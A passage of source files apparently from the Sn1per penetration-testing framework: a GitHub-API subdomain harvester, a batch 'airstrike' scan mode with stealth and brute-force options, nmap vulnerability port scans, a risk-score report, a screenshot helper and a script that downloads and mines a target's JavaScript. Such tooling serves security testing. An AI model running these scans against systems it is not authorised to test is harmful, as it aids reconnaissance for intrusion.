9 | import time
10 | import requests
11 | import random
12 | import argparse
13 | from functools import partial
14 | from colored import fg, bg, attr
15 | from multiprocessing.dummy import Pool
16 |
17 |
18 | TOKENS_FILE = os.path.dirname(os.path.realpath(__file__))+'/.tokens'
19 |
20 |
21 | def githubApiSearchCode( search, page ):
22 | headers = {"Authorization":"token "+random.choice(t_tokens)}
23 | url = 'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q=' + search + '&page=' + str(page)
24 | # print(url)
25 |
26 | try:
27 | r = requests.get( url, headers=headers, timeout=5 )
28 | json = r.json()
29 | return json
30 | except Exception as e:
31 | print( "%s[-] error occurred: %s%s" % (fg('red'),e,attr(0)) )
32 | return False
33 |
34 |
35 | def getRawUrl( result ):
36 | raw_url = result['html_url'];
37 | raw_url = raw_url.replace( 'https://github.com/', 'https://raw.githubusercontent.com/' )
38 | raw_url = raw_url.replace( '/blob/', '/' )
39 | return raw_url;
40 |
41 |
42 | def readCode( regexp, source, result ):
43 | url = getRawUrl( result )
44 | code = doGetCode( url )
45 | # print(code)
46 |
47 | if code:
48 | matches = re.findall( regexp, code )
49 | if matches:
50 | for sub in matches:
51 | # print(sub)
52 | sub = sub[0].replace('2F','').lower().strip()
53 | if len(sub) and not sub in t_history:
54 | t_history.append( sub )
55 | sys.stdout.write( "%s" % sub )
56 | if source:
57 | sys.stdout.write( "\t-> %s" % result['html_url'] )
58 | sys.stdout.write( "\n" )
59 |
60 |
61 | def doGetCode( url ):
62 | # print( url )
63 | try:
64 | r = requests.get( url, timeout=5 )
65 | except Exception as e:
66 | sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
67 | return False
68 |
69 | return r.text
70 |
71 |
72 | parser = argparse.ArgumentParser()
73 | parser.add_argument( "-t","--token",help="auth token (required)" )
74 | parser.add_argument( "-d","--domain",help="domain you are looking for (required)" )
75 | parser.add_argument( "-e","--extend",help="also look for example.com", action="store_true" )
76 | parser.add_argument( "-s","--source",help="display first url where subdomains are found", action="store_true" )
77 | parser.parse_args()
78 | args = parser.parse_args()
79 |
80 | t_tokens = []
81 | if args.token:
82 | t_tokens = args.token.split(',')
83 | else:
84 | if os.path.isfile(TOKENS_FILE):
85 | fp = open(TOKENS_FILE,'r')
86 | t_tokens = fp.read().split("\n")
87 | fp.close()
88 |
89 | if not len(t_tokens):
90 | parser.error( 'auth token is missing' )
91 |
92 | if args.source:
93 | _source = True
94 | else:
95 | _source = False
96 |
97 | if args.domain:
98 | _domain = args.domain
99 | else:
100 | parser.error( 'domain is missing' )
101 |
102 | t_history = []
103 | page = 1
104 | _search = '"' + _domain + '"'
105 |
106 | ### this is a test, looks like we got more result that way
107 | import tldextract
108 | t_host_parse = tldextract.extract( _domain )
109 | _search = '"' + t_host_parse.domain + '"'
110 | # print( t_host_parse )
111 | # exit()
112 | ###
113 |
114 | # egrep -io "[0-9a-z_\-\.]+\.([0-9a-z_\-]+)?`echo $h|awk -F '.' '{print $(NF-1)}'`([0-9a-z_\-\.]+)?\.[a-z]{1,5}"
115 |
116 |
117 | if args.extend:
118 | # _regexp = r'[0-9a-zA-Z_\-\.]+' + _domain.replace('.','\.')
119 | _regexp = r'([0-9a-z_\-\.]+\.([0-9a-z_\-]+)?'+t_host_parse.domain+'([0-9a-z_\-\.]+)?\.[a-z]{1,5})'
120 | else:
121 | _regexp = r'(([0-9a-zA-Z_\-\.]+)\.' + _domain.replace('.','\.')+')'
122 | # print(_regexp)
123 |
124 | # for page in range(1,10):
125 | while True:
126 | time.sleep( 1 )
127 | t_json = githubApiSearchCode( _search, page )
128 | # print(t_json)
129 | page = page + 1
130 |
131 | if not t_json or 'documentation_url' in t_json or not 'items' in t_json or not len(t_json['items']):
132 | break
133 |
134 | pool = Pool( 30 )
135 | pool.map( partial(readCode,_regexp,_source), t_json['items'] )
136 | pool.close()
137 | pool.join()
138 |
--------------------------------------------------------------------------------
/modes/airstrike.sh:
--------------------------------------------------------------------------------
1 | # AIRSTRIKE MODE #####################################################################################################
2 | if [[ "$MODE" = "airstrike" ]]; then
3 | if [[ -z "$FILE" ]]; then
4 | logo
5 | echo "You need to specify a list of targets (ie. -f ) to scan."
6 | exit
7 | fi
8 | if [[ "$REPORT" = "1" ]]; then
9 | for a in `cat $FILE`;
10 | do
11 | if [[ "$AUTO_BRUTE" = "1" ]]; then
12 | args="$args -b"
13 | fi
14 | if [[ "$FULLNMAPSCAN" = "1" ]]; then
15 | args="$args -fp"
16 | fi
17 | if [[ "$OSINT" = "1" ]]; then
18 | args="$args -o"
19 | fi
20 | if [[ "$RECON" = "1" ]]; then
21 | args="$args -re"
22 | fi
23 | if [[ ! -z "$WORKSPACE" ]]; then
24 | args="$args -w $WORKSPACE"
25 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
26 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
27 | mkdir -p $WORKSPACE_DIR 2> /dev/null
28 | mkdir $WORKSPACE_DIR/domains 2> /dev/null
29 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
30 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null
31 | mkdir $WORKSPACE_DIR/notes 2> /dev/null
32 | mkdir $WORKSPACE_DIR/reports 2> /dev/null
33 | mkdir $WORKSPACE_DIR/output 2> /dev/null
34 | fi
35 | args="$args -m stealth --noreport --noloot"
36 | TARGET="$a"
37 | args="$args -t $TARGET"
38 | echo -e "$OKRED |"
39 | echo -e "$OKRED | |"
40 | echo -e "$OKRED | -/_\-"
41 | echo -e "$OKRED -/_\- ______________(/ . \)______________"
42 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
43 | echo -e "$OKRED <> \___/ <> <>"
44 | echo -e "$OKRED "
45 | echo -e "$OKRED ||"
46 | echo -e "$OKRED <>"
47 | echo -e "$OKRED ||"
48 | echo -e "$OKRED <>"
49 | echo -e "$OKRED ||"
50 | echo -e "$OKRED || BIG"
51 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
52 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
53 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
54 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
55 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
56 | echo -e "$OKRED | ||. | | | ||| |||||"
57 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
58 | echo -e "$OKRED | ||. | | | ||| |||||"
59 | echo -e "$OKRED __________________________________________________________"
60 | echo -e "$RESET"
61 | if [[ ! -z "$WORKSPACE_DIR" ]]; then
62 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
63 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
64 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
67 | fi
68 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
69 | else
70 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
71 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
72 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
73 | fi
74 | args=""
75 | done
76 | fi
77 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
78 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
79 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
80 | fi
81 | if [[ "$LOOT" = "1" ]]; then
82 | loot
83 | fi
84 | exit
85 | fi
86 |
--------------------------------------------------------------------------------
/modes/fullportscan.sh:
--------------------------------------------------------------------------------
1 | if [[ "$FULLNMAPSCAN" = "0" ]]; then
2 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
3 | echo -e "$OKRED SKIPPING FULL NMAP PORT SCAN $RESET"
4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
5 | else
6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
7 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
8 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
9 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
10 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
11 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
12 | fi
13 | mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
14 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
15 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
16 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
17 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
18 | cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
19 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
20 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
21 | fi
22 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
23 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
24 | HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
25 | if [[ ${#HOST_UP} -ge 2 ]]; then
26 | echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
27 | fi
28 | sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
29 | rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
30 | for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
31 | echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
32 | done
33 | diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
34 |
35 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
36 |
37 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
38 |
39 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
40 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
41 | fi
42 | if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
43 | if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
44 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
45 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
46 | fi
47 | echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
48 | cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
49 | fi
50 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
51 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
52 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
53 | fi
54 | fi
--------------------------------------------------------------------------------
/modes/sc0pe.sh:
--------------------------------------------------------------------------------
1 | echo "====================================================================================" | tee $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
2 | CRITICAL_VULNS=$(egrep CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
3 | HIGH_VULNS=$(egrep HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
4 | MEDIUM_VULNS=$(egrep MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
5 | LOW_VULNS=$(egrep LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
6 | INFO_VULNS=$(egrep INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
7 | VULN_SCORE=$(($CRITICAL_VULNS*5+$HIGH_VULNS*4+$MEDIUM_VULNS*3+$LOW_VULNS*2+$INFO_VULNS*1))
8 | echo "•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• " | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
9 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
10 | echo "Critical: $CRITICAL_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
11 | echo "High: $HIGH_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
12 | echo "Medium: $MEDIUM_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
13 | echo "Low: $LOW_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
14 | echo "Info: $INFO_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
15 | echo "Score: $VULN_SCORE" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
16 | echo "$VULN_SCORE" 2> /dev/null > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
17 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
18 | egrep -h CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
19 | egrep -h HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
20 | egrep -h MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
21 | egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
22 | egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
23 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
24 | sort -u $LOOT_DIR/vulnerabilities/sc0pe-*.txt > $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null
25 | egrep "CRITICAL" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/critical_vulns_total.txt
26 | egrep "HIGH" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt
27 | egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt
28 | egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt
29 | egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt
30 | WORKSPACE_RISK_CRITCAL=$(cat $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 2> /dev/null)
31 | WORKSPACE_RISK_HIGH=$(cat $LOOT_DIR/vulnerabilities/high_vulns_total.txt 2> /dev/null)
32 | WORKSPACE_RISK_MEDIUM=$(cat $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 2> /dev/null)
33 | WORKSPACE_RISK_LOW=$(cat $LOOT_DIR/vulnerabilities/low_vulns_total.txt 2> /dev/null)
34 | WORKSPACE_RISK_INFO=$(cat $LOOT_DIR/vulnerabilities/info_vulns_total.txt 2> /dev/null)
35 | WORKSPACE_RISK_TOTAL=$(($WORKSPACE_RISK_CRITCAL*5+$WORKSPACE_RISK_HIGH*4+$WORKSPACE_RISK_MEDIUM*3+$WORKSPACE_RISK_LOW*2+$WORKSPACE_RISK_INFO*1))
36 | echo "$WORKSPACE_RISK_TOTAL" > $LOOT_DIR/vulnerabilities/vuln_score_total.txt 2> /dev/null
--------------------------------------------------------------------------------
/bin/webscreenshot.js:
--------------------------------------------------------------------------------
1 | /***
2 | # This file is part of webscreenshot.
3 | #
4 | # Copyright (C) 2014, Thomas Debize
5 | # All rights reserved.
6 | #
7 | # webscreenshot is free software: you can redistribute it and/or modify
8 | # it under the terms of the GNU Lesser General Public License as published by
9 | # the Free Software Foundation, either version 3 of the License, or
10 | # (at your option) any later version.
11 | #
12 | # webscreenshot is distributed in the hope that it will be useful,
13 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
15 | # GNU Lesser General Public License for more details.
16 | #
17 | # You should have received a copy of the GNU Lesser General Public License
18 | # along with webscreenshot. If not, see .
19 | ***/
20 |
21 | var Page = (function(custom_headers, http_username, http_password) {
22 | var opts = {
23 | width: 1200,
24 | height: 800,
25 | ajaxTimeout: 400,
26 | maxTimeout: 800,
27 | httpAuthErrorCode: 2
28 | };
29 |
30 | var requestCount = 0;
31 | var forceRenderTimeout;
32 | var ajaxRenderTimeout;
33 |
34 | var page = require('webpage').create();
35 | page.viewportSize = {
36 | width: opts.width,
37 | height: opts.height
38 | };
39 |
40 | page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36';
41 | page.settings.userName = http_username;
42 | page.settings.password = http_password;
43 |
44 | page.customHeaders = custom_headers;
45 |
46 | page.onInitialized = function() {
47 | page.customHeaders = {};
48 | };
49 | // Silence confirmation messages and errors
50 | page.onConfirm = page.onPrompt = page.onError = noop;
51 |
52 | page.onResourceRequested = function(request) {
53 | requestCount += 1;
54 | clearTimeout(ajaxRenderTimeout);
55 | };
56 |
57 | page.onResourceReceived = function(response) {
58 | if (response.stage && response.stage == 'end' && response.status == '401') {
59 | page.failReason = '401';
60 | }
61 |
62 | if (!response.stage || response.stage === 'end') {
63 | requestCount -= 1;
64 | if (requestCount === 0) {
65 | ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout);
66 | }
67 | }
68 | };
69 |
70 | var api = {};
71 |
72 | api.render = function(url, file) {
73 | opts.file = file;
74 |
75 | page.open(url, function(status) {
76 | if (status !== "success") {
77 | if (page.failReason && page.failReason == '401') {
78 | // Specific 401 HTTP code hint
79 | phantom.exit(opts.httpAuthErrorCode);
80 | } else {
81 | // All other failures
82 | phantom.exit(1);
83 | }
84 | } else {
85 | forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout);
86 | }
87 | });
88 | };
89 |
90 | function renderAndExit() {
91 | // Trick to avoid transparent background
92 | page.evaluate(function() {
93 | document.body.bgColor = 'white';
94 | });
95 |
96 | page.render(opts.file);
97 | phantom.exit(0);
98 | }
99 |
100 | function noop() {}
101 |
102 | return api;
103 | });
104 |
105 | function main() {
106 |
107 | var system = require('system');
108 | var p_url = new RegExp('url_capture=(.*)');
109 | var p_outfile = new RegExp('output_file=(.*)');
110 | var p_header = new RegExp('header=(.*)');
111 |
112 | var p_http_username = new RegExp('http_username=(.*)');
113 | var http_username = '';
114 |
115 | var p_http_password = new RegExp('http_password=(.*)');
116 | var http_password = '';
117 |
118 | var temp_custom_headers = {
119 | // Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930)
120 | 'Accept-Encoding': ' '
121 | };
122 |
123 | for(var i = 0; i < system.args.length; i++) {
124 | if (p_url.test(system.args[i]) === true)
125 | {
126 | var URL = p_url.exec(system.args[i])[1];
127 | }
128 |
129 | if (p_outfile.test(system.args[i]) === true)
130 | {
131 | var output_file = p_outfile.exec(system.args[i])[1];
132 | }
133 |
134 | if (p_http_username.test(system.args[i]) === true)
135 | {
136 | http_username = p_http_username.exec(system.args[i])[1];
137 | }
138 |
139 | if (p_http_password.test(system.args[i]) === true)
140 | {
141 | http_password = p_http_password.exec(system.args[i])[1];
142 | }
143 |
144 | if (p_header.test(system.args[i]) === true)
145 | {
146 | var header = p_header.exec(system.args[i]);
147 | var p_header_split = header[1].split(': ', 2);
148 | var header_name = p_header_split[0];
149 | var header_value = p_header_split[1];
150 |
151 | temp_custom_headers[header_name] = header_value;
152 |
153 | }
154 | }
155 |
156 | if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) {
157 | console.log("Usage: phantomjs [options] webscreenshot.js url_capture= output_file= [header= http_username= http_password=]");
158 | console.log('Please specify an URL to capture and an output png filename !');
159 |
160 | phantom.exit(1);
161 | }
162 | else {
163 | var page = Page(temp_custom_headers, http_username, http_password);
164 | page.render(URL, output_file);
165 | }
166 | }
167 |
168 | main();
--------------------------------------------------------------------------------
/modes/javascript-analysis.sh:
--------------------------------------------------------------------------------
1 | mkdir -p $LOOT_DIR/web/javascript/$TARGET 2> /dev/null
2 | cd $LOOT_DIR/web/javascript/$TARGET
3 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
4 | echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET"
5 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
6 | egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp'
7 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
8 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
9 | for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
10 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
11 | echo -e "$OKRED DISPLAYING ALL JAVASCRIPT COMMENTS $RESET"
12 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
13 | cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | egrep "\/\/|\/\*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-comments.txt
14 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
15 | echo -e "$OKRED DISPLAYING ALL JAVASCRIPT LINKS $RESET"
16 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
17 | cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-urls.txt
18 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
19 | echo -e "$OKRED RUNNING LINKFINDER $RESET"
20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
21 | cd $PLUGINS_DIR/LinkFinder/
22 | for a in `ls $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null`; do echo "Analyzing - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && python3 linkfinder.py -d -i $a -o cli 2> /dev/null | egrep -v "application\/|SSL error" > $LOOT_DIR/web/javascript-linkfinder-$TARGET-$FILENAME.txt 2> /dev/null; done;
23 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
24 | echo -e "$OKRED DISPLAYING PATH RELATIVE LINKS $RESET"
25 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
26 | cat $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-path-relative.txt
